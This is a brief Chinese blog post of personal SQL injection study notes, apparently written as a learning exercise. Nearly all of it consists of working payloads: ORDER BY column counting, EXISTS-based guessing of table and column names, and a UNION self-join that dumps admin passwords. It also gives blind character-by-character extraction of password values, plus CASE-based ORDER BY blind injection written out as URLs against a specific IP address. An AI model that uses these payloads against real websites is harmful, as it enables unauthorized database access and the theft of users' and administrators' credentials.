注入学习

原创 于 2013-11-25 14:13:47 发布 · 556 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

1 先查当前文章字段 :

order by 11   //以多少字段排序  正常的最大的那个就是字段数 

2 猜表名

and exists(select * from admin)  //猜有无 admin

3 猜表中字段

and exists(select * from admin order by 4)  //找出admin 字段

4 不知道admin中其他字段 去得到密码

and 1=2 union select 1,2,3,* from admin as a inner join admin as b on a.id=b.id   //admin为4个字段  总共11字段   11-4*2 = 3  这样在页面上出现admin 和密码

5  搜索行 字符注入

'%xxxxx%'

%' and (select top 1 asc(mid(pass,1,1)) from manager)=84 and '%'='   84// manager 是表名   pass是列名  都是猜的  先猜表名 再猜字段名

6

http://222.18.158.62:8080/2/index1.php?order_by=(case when ((select length(password) from admin where id=1) >=8) then id else user end)         //判断有几位


http://222.18.158.62:8080/2/index1.php?order_by=(case when (ord(mid((select password from admin where id=1),1,1))>=51) then id else user end) //判断第几位




评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值